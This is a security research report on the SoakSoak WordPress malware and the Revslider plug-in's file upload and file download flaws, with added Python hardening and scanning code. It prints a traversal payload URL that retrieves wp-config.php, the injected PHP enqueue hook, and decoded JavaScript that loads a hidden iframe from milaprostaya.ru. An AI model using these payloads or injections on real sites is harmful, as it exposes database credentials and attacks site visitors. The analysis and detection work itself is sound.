SoakSoak Malware Tracing Research Report
On December 14, 2014, the Sucuri security blog (abroad) reported that a large number of WordPress sites had been infected by the SoakSoak malware. According to the report, the malware infects WordPress source files and implants malicious code in them; attackers use SoakSoak to plant Trojans and backdoors on the infected sites.
A) Vulnerability description
According to the reports, the SoakSoak outbreak across a large number of WordPress sites stems from a slider plug-in named Revslider, in which multiple security vulnerabilities have been disclosed that allow arbitrary file download or upload. Revslider, produced by ThemePunch, is a commercial (paid) plug-in. It sells well thanks to its powerful features and good usability, and it is also bundled into some WordPress themes produced by ThemePunch.
Attackers can exploit the plug-in's Arbitrary File Download Vulnerability to obtain the wp-config.php configuration files of a large number of WordPress sites, and exploit the Arbitrary File Upload Vulnerability to upload a webshell, modify WordPress source files and insert malicious code. Combined with what the article reports, the attackers modify the WordPress source file "/wp-content/template-loader.php" so that a JavaScript script hosted on soaksoak.ru is loaded remotely whenever a page of the infected site is visited. Attackers use this JavaScript to attack specific browsers.
B) Vulnerability Analysis
A brief analysis of the Revslider plug-in's Arbitrary File Upload Vulnerability and Arbitrary File Download Vulnerability follows.
1) Arbitrary File Upload Vulnerability:
Because Revslider is a paid plug-in, the following analysis and test results are based on version 3.0.3.
The arbitrary file upload vulnerability is caused by the plug-in's built-in "plug-in update" function. When the plug-in is enabled, a series of actions are registered as WordPress ajax handlers. The plug-in does not check the user's permissions after accepting an update request, which malicious users can exploit.
Files involved: /revslider_admin.php
When enabled, the plug-in binds the ajax_action hook to the onAjaxAction() function, so onAjaxAction() is called whenever parameters are passed to the plug-in through /wp-admin/admin-ajax.php.
The key part of the onAjaxAction() function is as follows:
When the POST parameter $client_action is "update_plugin", updatePlugin() is called to upgrade the plug-in.
The updatePlugin() function is located in /inc_php/framework/base_admin.class.php.
Files involved: /inc_php/framework/base_admin.class.php
The following briefly analyzes how the file upload vulnerability arises. First, updatePlugin() obtains the uploaded file object from the POST request:
$arrFiles = UniteFunctionsRev::getVal($_FILES, "update_file");
It then obtains the file name and MIME type of the uploaded file (the plug-in has commented out the MIME type check).
Next, it gets the temporary path of the uploaded file and creates the directory "/temp/update_extract" (if the directory cannot be created, an exception is thrown and processing aborts):
If "/temp/update_extract" is created successfully, all files in the directory are cleared and the uploaded file is moved into it:
Obviously, there is no restriction on the file being uploaded: move_uploaded_file() copies the uploaded file (whatever it is) directly into the "/temp/update_extract/" directory, so the subsequent processing needs no further analysis.
Construct the following local form:
The content of temp.txt is:
Test file upload
Then click upload:
Here we can see that the response says "Update error", but according to the analysis above, the uploaded file has actually already been copied to the "/temp/update_extract/" directory via move_uploaded_file().
2) Arbitrary File Download Vulnerability:
When the plug-in is enabled, it provides a show_image function that can be called through WordPress ajax. The implementation of this function does not consider its input carefully, which leads to arbitrary file download: attackers can exploit it to download the WordPress configuration file wp-config.php and obtain sensitive data such as database connection information.
Files involved: /inc_php/framework/base_admin.class.php
When the plug-in is enabled, the show_image ajax request is bound to the onShowImage() handler. The onShowImage() function is defined in "/inc_php/framework/base.class.php".
Files involved: /inc_php/framework/base.class.php
The onShowImage() function instantiates the UniteImageViewRev class and calls its showImageFromGet() method.
Files involved: /inc_php/framework/image_view.class.php
The showImageFromGet() function obtains the value of the "img" parameter from the GET request and assigns it to a variable:
$imageFilename = UniteFunctionsRev::getGetVar("img");
Then note the variable $effect:
$effect = UniteFunctionsRev::getGetVar("e");
At the end of the function, the showImage() method is called. The key code of showImage() is as follows:
$this->pathImages is assigned the physical path of the WordPress "wp-content" directory at the beginning (for example, C:\xxxx\www\wordpress\wp-content\), and $filepath is built by concatenating $this->pathImages with the passed file name $filename:
$filepath = $this->pathImages . $filename;
Since $this->effect, $maxWidth and $maxHeight can all be supplied through GET request parameters, a payload can be constructed that drives the function flow to $this->outputImage($filepath), which reads the file. The outputImage() function is as follows:
The outputImage() function outputs the file content directly through two operations:
$contents = file_get_contents($filepath);
echo $contents;
There is no filtering anywhere in this process, so the following payload can be constructed as a test:
http://www.test.com/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
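As an added example (not from the report or the plug-in's own code), the following Python models the showImage() path handling described above: the vulnerable concatenation beside a hardened replacement that normalizes the requested path, requires it to stay under the images directory and allow-lists image extensions. The base path and file names are constructed values.

```python
import posixpath

# Constructed base path; the report's example is the Windows path C:\xxxx\www\wordpress\wp-content\
PATH_IMAGES = "/var/www/wordpress/wp-content/"
ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")

def vulnerable_filepath(filename, path_images=PATH_IMAGES):
    """Mirrors showImage(): $filepath = $this->pathImages . $filename, with no validation,
    so a name such as "../wp-config.php" resolves one directory above wp-content."""
    return path_images + filename

def resolve_contained(filename, path_images=PATH_IMAGES):
    """Normalize the requested path and return it only if it stays inside path_images."""
    base = posixpath.normpath(path_images)
    candidate = posixpath.normpath(posixpath.join(base, filename))
    if candidate == base:          # empty name or "." would serve the directory itself
        return None
    try:
        if posixpath.commonpath([base, candidate]) != base:
            return None            # ".." segments (or an absolute name) escaped the directory
    except ValueError:             # absolute/relative mix cannot share a prefix
        return None
    return candidate

def safe_filepath(filename, path_images=PATH_IMAGES, allowed_ext=ALLOWED_EXT):
    """Hardened replacement for the concatenation: containment check plus extension allow-list.
    (The ajax handler should additionally require an authenticated, authorized user.)"""
    candidate = resolve_contained(filename, path_images)
    if candidate is None:
        raise ValueError("path escapes the image directory: %r" % filename)
    if not candidate.lower().endswith(allowed_ext):
        raise ValueError("not an allowed image type: %r" % filename)
    return candidate

def is_allowed(filename, path_images=PATH_IMAGES, allowed_ext=ALLOWED_EXT):
    """Boolean wrapper around safe_filepath() for request handling and tests."""
    try:
        safe_filepath(filename, path_images, allowed_ext)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    for name in ("slides/banner.jpg", "../wp-config.php", "slides/../../wp-config.php"):
        print("%-28s vulnerable -> %s" % (name, vulnerable_filepath(name)))
        print("%-28s hardened   -> %s" % ("", safe_filepath(name) if is_allowed(name) else "rejected"))
```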
C) Vulnerability tracking
A PoC was written for the Arbitrary File Upload Vulnerability of the Revslider plug-in, and some WordPress sites carrying the Revslider plug-in fingerprint were extracted from ZoomEye for testing. Unfortunately, the vulnerability could not be verified on any of the test sites.
However, during scanning and testing we accidentally discovered a backdoor (backdoor address: http://wpsite/wp-content/plugins/revslider/temp/update_extract/temp.php).
After implanting the backdoor, the attacker modified the write permission of the directory involved in the File Upload Vulnerability, thereby blocking the vulnerability. This shows the attacker's skill and experience.
temp.php backdoor analysis:
Although the attackers modified the directory permission to block the plug-in's Arbitrary File Upload Vulnerability, the plug-in's Arbitrary File Download Vulnerability could still be used to retrieve the webshell (backdoor) they had uploaded, and we analyzed it.
After decoding the obfuscated webshell, we obtained backdoor code similar to c99.php (a webshell popular abroad).
Although the source code of the webshell was obtained, the hash of the webshell password was not cracked. (We will continue to follow up on and investigate this backdoor.)
SoakSoak:
The attackers inject malicious code that loads JavaScript to attack the browsers of visitors to the infected WordPress site using a 0day for Firefox and IE11; we speculate that the attackers are trying to obtain more bots for their next step.
First, the attackers modify the site's wp-includes/template-loader.php file and insert malicious code:
<?php
function FuncQueueObject() {
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
In this way, the swfobject.js JavaScript file in the site's "wp-includes/js/" directory is loaded whenever any page of the infected site is browsed.
The following is a sample of the wp-includes/js/swfobject.js file, injected with malicious code, obtained from an infected website on the Internet:
Decoding the encoded JavaScript that follows line 6 gives:
From the code above, it can be seen that after attackers infect a website with SoakSoak, malicious JavaScript is loaded and executed whenever any page of the site is browsed; the malicious code then loads a Flash file from the same site (a file that does not normally exist). The path of the malicious Flash file is "wp-contents/js/swfobject.swf". The following is a sample of the swfobject.swf file; its decompiled code (partial) is as follows:
When a visitor browses an infected website with Firefox or IE, another piece of malicious code is executed once the malicious Flash file is loaded.
The code executed by the ExternalInterface.call() function, after URL decoding, is as follows:
function() { var xxx = \"document.body.appendChild(document.createElement('iframe')).outerHTML = '<iframe src="http://milaprostaya.ru/images/" frameborder="0" height="0" width="0" ></iframe>';\"; eval( decodeURIComponent(xxx) );}
The above malicious code tries to load the content at "http://milaprostaya.ru/images/"; we suspect that in subsequent operations the attackers attack the visitor's browser and turn it into a zombie of their own, and more seriously a botnet may be formed to carry out further attacks. However, during our tracing and analysis, accessing "http://milaprostaya.ru/images/" directly yielded no useful information:
A personal WordPress blog is installed on http://milaprostaya.ru, and the WordPress blog system does not have a "/images" path of its own. (We will keep tracking this SoakSoak malware.)
(The CDN cloud defense platform can effectively intercept attacks exploiting the Revslider plug-in vulnerabilities and successfully defends against this malicious JavaScript attack.)
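The injected hook and the decoded loader above give a defender concrete indicators. The following Python scanner, added here and not part of the report, checks the contents of wp-includes/template-loader.php and wp-includes/js/swfobject.js against those indicators; the sample file contents are constructed and stand in for a real site's files.

```python
import re

# Indicators taken from the report: the add_action()/wp_enqueue_script() snippet injected into
# wp-includes/template-loader.php and the domains contacted by the decoded JavaScript.
LOADER_PATTERNS = {
    "injected FuncQueueObject hook": re.compile(
        r'add_action\(\s*["\']wp_enqueue_scripts["\']\s*,\s*["\']FuncQueueObject["\']'),
    "template-loader enqueues swfobject": re.compile(r'wp_enqueue_script\(\s*["\']swfobject["\']'),
}
JS_PATTERNS = {
    "soaksoak.ru reference": re.compile(r'soaksoak\.ru', re.I),
    "milaprostaya.ru reference": re.compile(r'milaprostaya\.ru', re.I),
    "eval of URL-decoded string": re.compile(r'eval\(\s*decodeURIComponent\('),
    "loads swfobject.swf": re.compile(r'swfobject\.swf', re.I),
    "long opaque encoded blob (heuristic)": re.compile(r'["\'][A-Za-z0-9%+/=]{300,}["\']'),
}

def scan_file(relpath, content):
    """Return the names of the indicators matched in one file; an empty list means clean."""
    relpath = relpath.replace("\\", "/")
    if relpath.endswith("wp-includes/template-loader.php"):
        patterns = LOADER_PATTERNS
    elif relpath.endswith("wp-includes/js/swfobject.js"):
        patterns = JS_PATTERNS
    else:
        return []
    return [name for name, rx in patterns.items() if rx.search(content)]

def scan_site(files):
    """files maps relative path -> content; returns {path: [indicators]} for flagged files only."""
    return {p: hits for p, c in files.items() for hits in [scan_file(p, c)] if hits}

# Constructed sample contents standing in for a clean and an infected site (not the real files).
CLEAN_LOADER = "<?php\n// loads the template for the current request\ndo_action('template_redirect');\n"
INFECTED_LOADER = ('<?php function FuncQueueObject(){wp_enqueue_script("swfobject");}'
                   'add_action("wp_enqueue_scripts",\'FuncQueueObject\');\n' + CLEAN_LOADER[6:])
CLEAN_SWFOBJECT = "/* SWFObject v2.2 */\nvar swfobject = function(){ /* ... */ }();\n"
INFECTED_SWFOBJECT = CLEAN_SWFOBJECT + (
    'var xxx = "document.body.appendChild(document.createElement(\'iframe\')).outerHTML = '
    '\'<iframe src=%22http://milaprostaya.ru/images/%22 height=%220%22 width=%220%22></iframe>\';";'
    ' eval(decodeURIComponent(xxx));\n')

if __name__ == "__main__":
    sample = {"wp-includes/template-loader.php": INFECTED_LOADER,
              "wp-includes/js/swfobject.js": INFECTED_SWFOBJECT}
    for path, hits in scan_site(sample).items():
        print(path, "->", "; ".join(hits))
```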
3. ZoomEye detection report
This vulnerability was probed in several ways, yielding the following data.
A) The first group of data
From ZoomEye, 0.1 million WordPress sites were randomly selected; the 5646 sites among them carrying the Revslider plug-in fingerprint were scanned for the backdoor. The results are as follows:
The Revslider plug-in rate is 5.64%.
A total of 5646 WordPress sites carrying the Revslider plug-in fingerprint were scanned; 537 of them were found with the suspected backdoor, a verification success rate of 9.51%.
We can see that among the more than 5000 test sites, 537 websites carrying the same backdoor were detected. This number cannot be underestimated, and it is only the result of detecting this one backdoor; it does not include websites that attackers compromised and implanted with other backdoors. In this light, the reported impact of SoakSoak on 0.1 million WordPress sites is not exaggerated at all.
If we extrapolate from the approximately 2.7 million WordPress sites in ZoomEye, about 14500 WordPress sites would be implanted with the backdoor, which is already a very large number.